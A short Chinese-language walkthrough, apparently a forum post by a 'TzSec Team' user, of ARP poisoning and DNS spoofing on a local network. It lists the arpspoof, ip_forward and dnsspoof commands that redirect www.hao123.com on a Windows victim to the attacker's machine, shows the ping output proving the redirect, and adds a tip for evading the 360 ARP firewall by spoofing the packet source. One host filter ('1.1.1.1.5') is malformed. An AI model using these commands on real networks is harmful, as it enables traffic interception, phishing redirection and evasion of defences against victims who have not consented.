先测试下DNS欺骗能否成功吧:
~# netstat -r
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
5.5.5.0 * 255.255.255.0 U 0 0 0 eth0
link-local * 255.255.0.0 U 0 0 0 eth0
default 1.1.1.2 0.0.0.0 UG 0 0 0 eth0
~# arpspoof 1.1.1.2 -t 1.1.1.5 /终端1
~# arpspoof 1.1.1.5 -t 1.1.1.2 /终端2
~# echo 1 > /proc/sys/net/ipv4/ip_forward /转发
打开arp防火墙后发现有动静即算成功
复制代码
欺骗下dns 不停的发包吧~~~
~# cat baidu
1.1.1.4 www.hao123.com /1.1.1.4本机的
~# dnsspoof -f baidu host 1.1.1.1.5 and udp port 53
~#cat send /继续不停的发包~~~
arpspoof 1.1.1.5 -t 1.1.1.2
arpspoof 1.1.1.2 -t 1.1.1.5
~# screen ./send
[1]+ Stopped screen ./send
~#screen ./send
[2]+ Stopped screen ./send /多做几次就可以射了
~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~
~#screen -ls /看下进程
There are screens on:
3754.pts-7.TzSec Team (11/01/2012 12:21:47 AM) (Detached)
3750.pts-7.TzSec Team (11/01/2012 12:21:46 AM) (Detached)
3746.pts-7.TzSec Team (11/01/2012 12:21:44 AM) (Detached)
3742.pts-7.TzSec Team (11/01/2012 12:21:41 AM) (Detached)
3722.pts-4.TzSec Team (11/01/2012 12:21:21 AM) (Attached)
6 Sockets in /var/run/screen/S-root.
~#
下面就是转到win下
ping www.hao123.com
Pinging www.hao123.com [1.1.1.4] with 32 bytes of data:
Reply from 1.1.1.4: bytes=32 time<1ms TTL=64
Reply from 1.1.1.4: bytes=32 time<1ms TTL=64
复制代码
对于360应该伪装下发包源就可以了